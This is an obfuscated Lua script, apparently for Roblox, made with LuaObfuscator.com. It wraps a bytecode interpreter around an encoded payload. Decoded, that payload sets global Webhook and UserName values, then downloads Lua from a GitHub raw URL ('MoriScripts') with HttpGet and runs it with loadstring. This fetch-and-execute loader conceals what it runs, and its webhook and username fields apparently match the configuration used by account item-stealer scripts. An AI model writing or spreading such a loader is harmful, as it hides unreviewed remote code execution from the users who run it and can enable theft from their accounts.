--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v68=0 -0 ;local v69;while true do if ((0 -0)==v68) then v69=(v31/(((3 + 0) -1)^(v32-(2 -1))))%((621 -(555 + (91 -27)))^(((v33-1) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v69-(v69%(928 -((1279 -(68 + 997)) + (1983 -(226 + 1044))))) ;end end else local v70=0 + 0 ;local v71;while true do if (v70==0) then v71=2^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and (878 -(282 + 595))) or (1637 -((6631 -5108) + 114)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (121 -(32 + 85)) ;return (v37 * (16441815 + 335401)) + (v36 * 65536) + (v35 * (57 + 199)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(700 -(208 + 490))) then local v73=0;while true do if (v73~=(0 + 0)) then else v43=nil;v44=nil;v73=1 + 0 ;end if (v73==(66 -(30 + 35))) then v38=3;break;end end end if (v38==(837 -(660 + 176))) then local v74=0;while true do if (v74==(1 + 0)) then v38=1259 -(1043 + 214) ;break;end if (v74==(0 -0)) then v41=nil;v42=nil;v74=1213 -(323 + 889) ;end end end if (v38==0) then local v75=0 + 0 ;while true do if (v75==(580 -(361 + 219))) then local v100=0;while true do if (v100==(202 -(14 + 188))) then v39=675 -(534 + 141) ;v40=nil;v100=321 -(53 + 267) ;end if ((1 + 0)==v100) then v75=1 + 0 ;break;end end end if (v75==1) then v38=1 + 0 ;break;end end end if (v38~=3) then else v45=nil;while true do local v79=0;local v80;while true do if (v79==(0 + 0)) then v80=0;while true do if (v80~=1) then else if ((982 -(18 + 964))~=v39) then else local v106=0;local v107;local v108;while true do if (v106==(3 -2)) then while true do if (v107==(0 -0)) then v108=0;while true do if (v108~=(1 -0)) then else local v164=0 + 0 ;while true do if (v164~=0) then else v42={};v43={v40,v41,nil,v42};v164=1 + 0 ;end if (v164~=(397 -(115 + 281))) then else v108=2;break;end end end if (v108==(4 -2)) then v39=1 + 0 ;break;end if (0==v108) then v40={};v41={};v108=1;end end break;end end break;end if (v106==(0 -0)) then v107=0 -0 ;v108=nil;v106=1 -0 ;end end end break;end if (v80==(867 -(550 + 317))) then local v105=0 -0 ;while true do if (v105~=(0 + 0)) then else local v109=0;while true do if (v109==0) then if (v39~=2) then else local v160=0 -0 ;while true do local v163=0 -0 ;while true do if (v163~=(285 -(134 + 151))) then else if (v160==(1665 -(970 + 695))) then local v165=0;while true do if (v165==(1 + 0)) then v160=1;break;end if (v165~=(0 -0)) then else for v168=1,v24() do local v169=1990 -(582 + 1408) ;local v170;local v171;while true do if (v169==(0 -0)) then v170=1551 -(1126 + 425) ;v171=nil;v169=1;end if (v169==1) then while true do if (v170==0) then v171=v22();if (v21(v171,1,1 -0 )==(0 -0)) then local v182=1121 -(118 + 1003) ;local v183;local v184;local v185;local v186;local v187;while true do if (v182==(5 -3)) then v187=nil;while true do if (v183~=(379 -(142 + 235))) then else while true do if (v184==(1826 -(1195 + 629))) then local v193=0 -0 ;while true do if (v193==(1 + 0)) then v184=244 -(187 + 54) ;break;end if (v193==(780 -(162 + 618))) then if (v21(v186,1 -0 ,1 + 0 )==(1 + 0)) then v187[2 + 0 ]=v45[v187[2 + 0 ]];end if (v21(v186,1 + 1 ,2 + 0 )~=(2 -1)) then else v187[6 -3 ]=v45[v187[3]];end v193=1 -0 ;end end end if ((1 + 0)~=v184) then else local v194=0;while true do if (v194~=(1636 -(1373 + 263))) then else v187={v23(),v23(),nil,nil};if (v185==(0 -0)) then local v206=0 -0 ;local v207;local v208;while true do if (v206==(1 + 0)) then while true do if (v207~=(0 -0)) then else v208=753 -(239 + 514) ;while true do if (v208==(0 -0)) then v187[3]=v23();v187[2 + 2 ]=v23();break;end end break;end end break;end if ((1384 -(746 + 638))==v206) then v207=0;v208=nil;v206=1 + 0 ;end end elseif (v185==(1 -0)) then v187[3 + 0 ]=v24();elseif (v185==2) then v187[2 + 1 ]=v24() -(2^(357 -(218 + 123))) ;elseif (v185==(1205 -(373 + 829))) then local v213=1581 -(1535 + 46) ;while true do if (v213==(1130 -(369 + 761))) then v187[3 + 0 ]=v24() -((1 + 1)^16) ;v187[564 -(306 + 254) ]=v23();break;end end end v194=1 -0 ;end if (v194==(1 + 0)) then v184=2;break;end end end if (v184==0) then local v195=0 -0 ;local v196;while true do if (v195==(0 + 0)) then v196=1467 -(899 + 568) ;while true do if (v196==(1 + 0)) then v184=337 -(144 + 192) ;break;end if (v196~=(0 -0)) then else local v209=603 -(268 + 335) ;while true do if (v209==(1 + 0)) then v196=1 + 0 ;break;end if (v209~=(290 -(60 + 230))) then else v185=v21(v171,1 + 1 ,1507 -(363 + 1141) );v186=v21(v171,576 -(426 + 146) ,1586 -(1183 + 397) );v209=1 + 0 ;end end end end break;end end end if (v184~=(1459 -(282 + 1174))) then else if (v21(v186,3,3 + 0 )==(812 -(569 + 242))) then v187[4]=v45[v187[11 -7 ]];end v40[v168]=v187;break;end end break;end if (v183~=1) then else v186=nil;v187=nil;v183=1 + 1 ;end if (0~=v183) then else local v192=1024 -(706 + 318) ;while true do if (v192~=(1252 -(721 + 530))) then else v183=1272 -(945 + 326) ;break;end if ((1933 -(565 + 1368))~=v192) then else v184=0 -0 ;v185=nil;v192=1;end end end end break;end if (v182~=(1662 -(1477 + 184))) then else v185=nil;v186=nil;v182=2;end if ((0 -0)==v182) then v183=0 + 0 ;v184=nil;v182=1 + 0 ;end end end break;end end break;end end end for v172=857 -(564 + 292) ,v24() do v41[v172-(701 -(271 + 429)) ]=v29();end v165=1;end end end if (v160==(1 + 0)) then return v43;end break;end end end end if ((1 -0)==v39) then local v161=1500 -(1408 + 92) ;local v162;while true do if (v161==(1086 -(461 + 625))) then v162=304 -(244 + 60) ;while true do if (v162==0) then v44=v24();v45={};v162=1;end if ((1290 -(993 + 295))==v162) then v39=478 -(41 + 435) ;break;end if (1==v162) then local v166=0 + 0 ;while true do if (v166==0) then local v167=1171 -(418 + 753) ;while true do if (v167==0) then for v175=1 + 0 ,v44 do local v176=0 + 0 ;local v177;local v178;local v179;local v180;while true do if (v176~=(0 + 0)) then else local v181=0 + 0 ;while true do if (v181~=(0 + 0)) then else v177=529 -(406 + 123) ;v178=nil;v181=268 -(176 + 91) ;end if (v181~=1) then else v176=2 -1 ;break;end end end if (v176==(1770 -(1749 + 20))) then v179=nil;v180=nil;v176=1 + 1 ;end if (v176~=(1877 -(157 + 1718))) then else while true do if (v177==(1322 -(1249 + 73))) then local v188=0 -0 ;while true do if (v188==(0 + 0)) then v178=0;v179=nil;v188=1146 -(466 + 679) ;end if ((2 -1)==v188) then v177=2 -1 ;break;end end end if (v177~=(2 -1)) then else v180=nil;while true do if (v178==1) then if (v179==1) then v180=v22()~=(1900 -(106 + 1794)) ;elseif (v179==2) then v180=v25();elseif (v179~=(1 + 2)) then else v180=v26();end v45[v175]=v180;break;end if ((0 + 0)==v178) then local v190=0 -0 ;local v191;while true do if (0==v190) then v191=0;while true do if (v191~=(2 -1)) then else v178=1;break;end if (v191==0) then local v198=0;local v199;while true do if (v198~=(0 -0)) then else v199=114 -(4 + 110) ;while true do if (v199==(584 -(57 + 527))) then local v211=0;while true do if (v211~=(1227 -(322 + 905))) then else v179=v22();v180=nil;v211=1;end if (v211~=1) then else v199=1428 -(41 + 1386) ;break;end end end if (v199==1) then v191=104 -(17 + 86) ;break;end end break;end end end end break;end end end end break;end end break;end end end v43[3 + 0 ]=v22();v167=1 -0 ;end if ((948 -(245 + 702))==v167) then v166=3 -2 ;break;end end end if (v166==(2 -1)) then v162=2;break;end end end end break;end end end v109=167 -(122 + 44) ;end if (v109==(1 + 0)) then v105=1 -0 ;break;end end end if (v105==(1899 -(260 + 1638))) then v80=3 -2 ;break;end end end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=(239 -(141 + 95)) -2 ;local v49=(v21(v47,1,20) * ((2 + 0)^((150 -85) -33))) + v46 ;local v50=v21(v47,(61 + 1) -(105 -64) ,1236 -(902 + 303) );local v51=((v21(v47,69 -(88 -51) )==(2 -1)) and  -1) or (1 + 0) ;if (v50==(1690 -(1121 + 569))) then if (v49==(0 + 0)) then return v51 * ((586 -372) -(22 + 192)) ;else v50=684 -(483 + 200) ;v48=1463 -(1404 + (106 -47)) ;end elseif (v50==(5601 -3554)) then return ((v49==(0 -0)) and (v51 * ((766 -(468 + 297))/0))) or (v51 * NaN) ;end return v8(v51,v50-(1585 -(334 + 65 + 163)) ) * (v48 + (v49/(2^(175 -123)))) ;end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==(0 + 0)) then return "";end end v53=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;local v54={};for v66=1 -0 , #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56,v57=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (165 -(92 + 71)) ;return (v57 * 256) + v56 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v58)if (v1(v58,2)==79) then v20=v0(v3(v58,1,1));return "";else local v72=v2(v0(v58,16));if v20 then local v81=0;local v82;while true do if (v81==0) then v82=v5(v72,v20);v20=nil;v81=1;end if (v81==1) then return v82;end end else return v72;end end end);v18=1;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v83=v63;local v84=v64;local v85=v65;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=11) then if (v96<=5) then if (v96<=2) then if (v96<=0) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96>1) then do return;end else v93[v95[2]]=v95[3]~=0 ;end elseif (v96<=3) then v93[v95[2]]=v95[3]~=0 ;elseif (v96==4) then do return;end else v93[v95[2]]();end elseif (v96<=8) then if (v96<=6) then local v111=v95[2];local v112=v93[v95[3]];v93[v111 + 1 ]=v112;v93[v111]=v112[v95[4]];elseif (v96>7) then v87=v95[3];else v93[v95[2]]=v61[v95[3]];end elseif (v96<=9) then local v116=v95[2];v93[v116]=v93[v116](v13(v93,v116 + 1 ,v88));elseif (v96>10) then v93[v95[2]][v95[3]]=v95[4];else v93[v95[2]]=v95[3];end elseif (v96<=17) then if (v96<=14) then if (v96<=12) then local v118=v95[2];v93[v118]=v93[v118](v13(v93,v118 + 1 ,v88));elseif (v96==13) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end else v93[v95[2]]();end elseif (v96<=15) then v87=v95[3];elseif (v96==16) then v93[v95[2]]=v61[v95[3]];else local v144=v95[2];local v145,v146=v86(v93[v144](v13(v93,v144 + 1 ,v95[3])));v88=(v146 + v144) -1 ;local v147=0;for v152=v144,v88 do v147=v147 + 1 ;v93[v152]=v145[v147];end end elseif (v96<=20) then if (v96<=18) then local v121=v95[2];local v122,v123=v86(v93[v121](v13(v93,v121 + 1 ,v95[3])));v88=(v123 + v121) -1 ;local v124=0;for v130=v121,v88 do v124=v124 + 1 ;v93[v130]=v122[v124];end elseif (v96>19) then v93[v95[2]][v95[3]]=v95[4];else for v155=v95[2],v95[3] do v93[v155]=nil;end end elseif (v96<=21) then local v125=v95[2];local v126=v93[v95[3]];v93[v125 + 1 ]=v126;v93[v125]=v126[v95[4]];elseif (v96>22) then v93[v95[2]]=v95[3];else for v157=v95[2],v95[3] do v93[v157]=nil;end end v87=v87 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D653200253O00120A3O00014O0016000100013O00260D3O0002000100010004083O0002000100120A000100013O00260D00010012000100020004083O00120001001210000200033O00300B000200040005001210000200063O001210000300073O00200600030003000800120A000500094O0001000600014O0011000300064O000900023O00022O000E0002000100010004083O0024000100260D00010005000100010004083O0005000100120A000200013O00260D00020019000100020004083O0019000100120A000100023O0004083O0005000100260D00020015000100010004083O00150001001210000300033O00300B0003000A0005001210000300033O00300B0003000B000500120A000200023O0004083O001500010004083O000500010004083O002400010004083O000200012O00043O00017O00",v9(),...);end
